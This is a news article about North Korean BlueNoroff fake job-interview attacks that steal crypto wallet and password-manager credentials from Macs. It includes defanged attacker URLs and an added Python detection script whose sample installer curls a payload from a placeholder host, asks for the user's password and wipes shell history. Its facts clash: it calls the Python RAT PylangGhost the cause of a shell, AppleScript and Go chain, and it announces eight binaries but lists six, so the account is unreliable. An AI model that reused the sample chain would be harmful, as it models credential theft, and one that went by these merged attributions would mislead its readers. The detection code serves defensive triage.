New North Korean Malware Is Stealing Information From Macs of Crypto Professionals

BlueNoroff, a threat actor aligned with the infamous North Korean hacking group Lazarus, is targeting job seekers in the Web3 sector with a new malware designed to steal passwords for crypto wallets and other apps from Apple macOS devices.

This sub-cluster within Lazarus Group has previously been tracked under several aliases, including Alluring Pisces, APT38, Black Alicanto, Copernicium, Nickel Gladstone, Stardust Chollima, Famous Chollima, and TA444. It has a history of attacking financial institutions, cryptocurrency businesses, and ATMs to generate revenue for Kim Jong Un’s government.
North Korea-Linked BlueNoroff Targets Web3 Professionals Through Fake Job Recruitment Campaign

New North Korean Malware Detected on Wednesday

On Wednesday, commercial threat intelligence group Cisco Talos reported that it had found a new Python-based remote access trojan (RAT) called “PylangGhost” making the rounds in a “contagious interview” campaign, which tricked crypto and blockchain professionals into installing the malware on their personal computers.

However, this is not the first time BlueNoroff has been spotted. Cisco Talos has been tracking the group, also known as Wagemole, since mid-2024. They were identified in several recent incidents where North Korean hackers attempted to infiltrate US-based crypto firms like Kraken by applying for open job listings.

Famous Chollima has reversed its strategy by setting bait for job seekers and employees with previous experience in the blockchain industry, particularly from India, through fake interview campaigns that rely on social engineering.


How Does the “PylangGhost” Malware Compromise Macs?

Cisco claimed that the group creates fraudulent job sites and skill-testing pages that mimic legitimate firms such as Coinbase, Robinhood, and Uniswap, where the victims are guided through a multi-step process. Cybersecurity firm Huntress revealed further details of the intrusion involving the employee of an unnamed crypto organization.

This individual received a message on Telegram from an unknown contact posing as a recruiter, who asked for time to talk and sent a link from Calendly, an online appointment scheduling service. Although the URL appears to point to a Google Meet event, clicking it redirects the target to a fake Zoom domain controlled by the attacker.

The victim told Huntress researchers that they joined a group Zoom meeting a few weeks later, which included several deepfakes of known senior leadership members of the company, along with other external contacts. When the individual said they weren’t able to use their camera and microphone during the call, the threat actors urged them to download and install a malicious Zoom extension that was shared via Telegram.

They were tricked into copying and executing an AppleScript that went by the name “zoom_sdk_support.scpt”, which first opens a legitimate webpage for the Zoom software development kit (SDK). But under the pretense of installing updated video drivers, the script downloads a next-stage payload from a remote server called “support[.]us05web-zoom[.]biz” and executes a shell script.

Upon execution, PylangGhost disables bash history logging and then checks whether Rosetta 2 is installed on the compromised Mac. Rosetta 2 is software that allows Apple Silicon-based Macs (M1-M4 series) to run apps built for Intel-powered Macs. The script installs it if it is not found.

It then creates a hidden file called “.pwd” and downloads a binary from “web071zoom[.]us/fix/audio-fv/7217417464” on the fake Zoom site to “/tmp/iclpud_helper” on the Mac. It also makes a second request, to “web071zoom[.]us/fix/audio-tr/7217417464”, to fetch another, as yet unidentified, payload.

The shell script then prompts the victim for their computer password, enabling remote control of the infected device and the theft of cookies and credentials from over 80 browser extensions, including password managers and cryptocurrency wallets such as MetaMask, 1Password, NordPass, Phantom, Bitski, Intia, TronLink, and MultiverseX.
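The installer behaviour described above (history logging disabled, a Rosetta check and install, a hidden “.pwd” file, a download into /tmp, a password prompt, and the final history wipe) lends itself to a simple triage check for scripts found on an endpoint. The following is an added example written for this article, not code from Talos, Huntress, or the malware itself; the regexes are assumed heuristics for how such behaviour typically appears in a shell script, and the sample script is constructed and inert.

```python
import re

# Heuristic indicators for the behaviours the article describes. The patterns
# are assumptions about how each behaviour commonly appears in shell scripts,
# not published detection signatures.
INDICATORS = {
    "history_disabled": re.compile(r"(unset\s+HISTFILE|set\s+\+o\s+history|HISTFILE=/dev/null|HISTSIZE=0)"),
    "rosetta_install": re.compile(r"softwareupdate\s+--install-rosetta"),
    "hidden_pwd_file": re.compile(r"\.pwd\b"),
    "download_to_tmp": re.compile(r"curl\b[^\n]*\s-o\s+/tmp/\S+"),
    "password_prompt": re.compile(r"display\s+dialog[^\n]*with\s+hidden\s+answer", re.IGNORECASE),
    "history_wiped": re.compile(r"(history\s+-c|rm\s+-f\s+~/\.(bash|zsh)_history)"),
}


def scan_script(text):
    """Return the names of the indicators present, in the order defined above."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def risk_level(hits):
    """Collapse the hit list into a coarse triage verdict."""
    if len(hits) >= 3:
        return "high"
    if hits:
        return "medium"
    return "none"


# Constructed, inert sample that mirrors the described installer flow.
# Placeholder host and path; nothing here is a real indicator.
SAMPLE = """#!/bin/bash
unset HISTFILE
if ! /usr/bin/pgrep -q oahd; then
  softwareupdate --install-rosetta --agree-to-license
fi
touch ~/.pwd
curl -s https://example.invalid/fix/audio-fv/0000 -o /tmp/helper_placeholder
chmod +x /tmp/helper_placeholder
osascript -e 'display dialog "Enter password to update drivers" default answer "" with hidden answer'
history -c
"""

# Constructed benign script used as a control.
BENIGN = """#!/bin/bash
brew update && brew upgrade
"""

if __name__ == "__main__":
    for label, script in (("sample", SAMPLE), ("benign", BENIGN)):
        hits = scan_script(script)
        print(label, risk_level(hits), hits)
```

Any single indicator is common in legitimate admin scripts; the combination is what should drive escalation.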

PylangGhost can also carry out other tasks like taking screenshots, managing files, stealing browser data, collecting system information, and maintaining remote access to the compromised Mac. After completing its mission, the malware wipes the history of executed commands to avoid leaving any forensic trail.

Huntress’s investigation led to the discovery of eight distinct malicious binaries on the victim’s computer:

  • Telegram 2 – a Nim binary responsible for initiating the primary backdoor
  • Root Troy V4 – a fully-featured Go backdoor used to run remote AppleScript payloads, shell commands, download additional malware, and execute them
  • InjectWithDyld – a C++ binary loader downloaded by Root Troy V4 that loads two more payloads, one to facilitate process injection and the other to enable the operator to issue commands and receive responses asynchronously
  • XScreen – an Objective-C keylogger that can monitor the victim’s keystrokes, clipboard, and screen, and send the information to a command-and-control (C2) server
  • CryptoBot – another Go-based information stealer that is designed to steal cryptocurrency-related files from the host’s computer
  • NetChk – an almost empty binary that can generate random numbers forever

Development and Cybersecurity Teams of Crypto Firms Are BlueNoroff’s Main Target

This is not the first time BlueNoroff has used fake job interviews to lure victims. The North Korean-linked group is best known for orchestrating a series of highly sophisticated crypto heists known as TraderTraitor, targeting employees of organizations engaged in blockchain research with malicious RATs.

Hackers behind the $1.4 billion Bybit exploit from February 2025 used fake recruitment tests infected with malware to target the exchange’s developers. The $700 million Axie Infinity hack from March 2022 was also the result of a similar campaign.

Recently, after stopping an apparent malware attack, crypto exchange BitMEX claimed that the Lazarus Group uses at least two teams during operations: a low-skill team to first breach the target’s security protocols and a high-skill team to conduct subsequent thefts.

Huntress warned that remote workers who are involved in high-risk areas, such as development and security, are the group’s primary target. The cybersecurity research firm has advised companies to train their employees to identify common attacks that begin with social engineering related to remote meeting software like Zoom and Google Meet.
